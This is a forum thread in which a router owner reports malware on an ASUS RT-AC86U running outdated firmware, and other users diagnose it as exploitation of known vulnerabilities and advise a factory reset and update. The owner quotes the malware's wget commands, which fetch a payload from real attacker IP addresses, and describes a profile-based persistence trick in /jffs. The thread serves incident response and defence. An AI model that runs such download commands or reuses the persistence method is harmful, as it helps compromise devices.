Malware connecting to various IPs upon SSH login to router

[sashabe]

I have been using an ASUSWRT-Merlin installed on RT-AC86U, 384.11-2 for a couple of years. SSH login is enabled from LAN only from a single computer (via auth key), but Web UI has been allowed for both HTTP and HTTPS. Some other customer features have been enabled (Smart Disk, Smart Access, IPSec VPN server, TimeMachine). Nothing major was installed from third party (eg Diversion, Skynet etc.) except for Transmission. Both login and password for the router are set to non default ones.

Yesterday i logged in via SSH and got a bunch of mostly failing commands that looked like this (a bigger file is attached containing a copy-paste list from Terminal):

--2022-07-16 13:33:03--  http://184.70.140.86:8078/H9PIVokOxv4nQdme/dlr
Connecting to 184.70.140.86:8078... connected.
HTTP request sent, awaiting response...

This happens right after SSH login, so i can't enter my own commands without quickly issuing ctrl+c tens of times before the process stops throwing them replacing one with another, and i can enter my own.

I tracked the renegade process down to this command in htop: /bin/sh -c wget --timeout=10 --tries=3 http://103.29.215.199:8078/H9PIVokOxv4nQdme/dlr -O /tmp/x. The "x" file is empty. But most of the these connections are failing anyway.

Tried to grep the router for some source file that starts the commands, but to no avail. Also it seems as if the malware should have put something into an sh profile file that runs on SSH login, but eg /etc/profile seems clean.

Have you ever encountered this type of malware? How could I have prevented it as a lesson learnt? I guess I'd need to update the firmware anyway, but wasn't SSH login secure in this case?

 

[ColinTaylor]

I don't recognise those specific commands. But the 384.x firmwares have known vulnerabilities that have been actively exploited. Smart Disk and Smart Access (as well as remote HTTP/S access) expose services to the internet and are also known to have security issues. In other words you current setup is highly susceptible to being hacked.

The solution is to factory reset (with initialise) your router, install the current 386.x firmware and follow that with another factory reset.

Here's just one example from Asus' Product Security Advisory.

03/25/2022 Security Advisory for Cyclops Blink ∇
ASUS is investigating and working for a remediation for Cyclops Blink and will continue to post software update.

To help owners of these routers take necessary precautions, we compiled a security checklist:
(1) Reset the device to factory default: Login into the web GUI(http://router.asus.com) , go to Administration → Restore/Save/Upload Setting, click the “Initialize all the setting and clear all the data log”, and then click Restore button”
(2) Update all devices to the latest firmware.
(3) Ensure default admin password had been changed to a more secure one.
(4) Disable Remote Management (disabled by default, can only be enabled via Advanced Settings).

Affected products

GT-AC5300 firmware = 3.0.0.4.384.xxxx or earlier version
GT-AC2900 firmware = 3.0.0.4.384.xxxx or earlier version
RT-AC5300 firmware = 3.0.0.4.384.xxxx or earlier version
RT-AC88U firmware = 3.0.0.4.384.xxxx or earlier version
RT-AC3100 firmware = 3.0.0.4.384.xxxx or earlier version
RT-AC86U firmware = 3.0.0.4.384.xxxx or earlier version.
RT-AC68U, AC68R, AC68W, AC68P firmware = 3.0.0.4.384.xxxx or earlier version
RT-AC66U_B1 firmware = 3.0.0.4.384.xxxx or earlier version
RT-AC3200. We advise users to reset the router and disable remote connection. New firmware will be released soon.
RT-AC2900 firmware = 3.0.0.4.384.xxxx or earlier version.
RT-AC1900P, RT-AC1900P = 3.0.0.4.384.xxxx or earlier version.
RT-AC87U (EOL)
RT-AC66U (EOL)
RT-AC56U (EOL)

Please note that if you choose not to install this new firmware version then, to avoid any potential unwanted intrusion, we strongly recommend that you disable remote access from WAN and reset your router to its default settings.

If you have already installed the latest firmware version, please disregard this notice.

Should you have any question or concerns, please contact ASUS via our Security Advisory reporting system:
https://www.asus.com/securityadvisory

For further help with router setup and an introduction to network security, please visit
https://www.asus.com/support/FAQ/1008000
https://www.asus.com/support/FAQ/1039292

 

[sashabe]

Thanks for the reply @ColinTaylor! That explains it.

I'm still wondering how did the malicious script manage to insert itself into SSH login (without apparently modifying user profile config) and why.

But I will proceed with resetting and updating the router, that indeed seems to be the best way to go.

 

[sashabe]

A bit of extra info that i've discovered after some research.

The malware creates a profile file at /jffs/etc (I had missed the fact that this file apparently wasn't there before) which calls a binary at /jffs/.config_read-X:

/jffs/.config_read-1 ; /jffs/.config_read-2 ; /jffs/.config_read-3 ; /jffs/.config_read-4

In my case it added a single file .config_read-1 to /jffs as well as a .ssh-config which is also binary.

So the profile file makes sure stuff from .config_read-X gets executed on every SSH login. Why is the binary .ssh-config present i have no idea though.

There's no info on the web about this combo of file names, so this malware might be pretty new (or just a bit less dumb than is visible to the eye).

 

[wouterv]

SSH is just one way to access the operating system
Your router has been wide open to the world by having Web access enabled with a vulnerable firmware version.
For quite sure your router is used as source for e.g. DDOS attacks, besides what they possibly monitored and grabbed from your own network.
Don't think that some hacker in his loft has been trying to access your router, those are automated systems that scan for open devices.
Please take the router of the net as soon as possible and fix it as told in an earlier post.

 

[RMerlin]

A bit of extra info that i've discovered after some research.

The malware creates a profile file at /jffs/etc (I had missed the fact that this file apparently wasn't there before) which calls a binary at /jffs/.config_read-X:

/jffs/.config_read-1 ; /jffs/.config_read-2 ; /jffs/.config_read-3 ; /jffs/.config_read-4

In my case it added a single file .config_read-1 to /jffs as well as a .ssh-config which is also binary.

So the profile file makes sure stuff from .config_read-X gets executed on every SSH login. Why is the binary .ssh-config present i have no idea though.

There's no info on the web about this combo of file names, so this malware might be pretty new (or just a bit less dumb than is visible to the eye).

If you still have these files, zip them and email them to me please. I will forward them upstream to Asus for their analysis in case it's a new strain.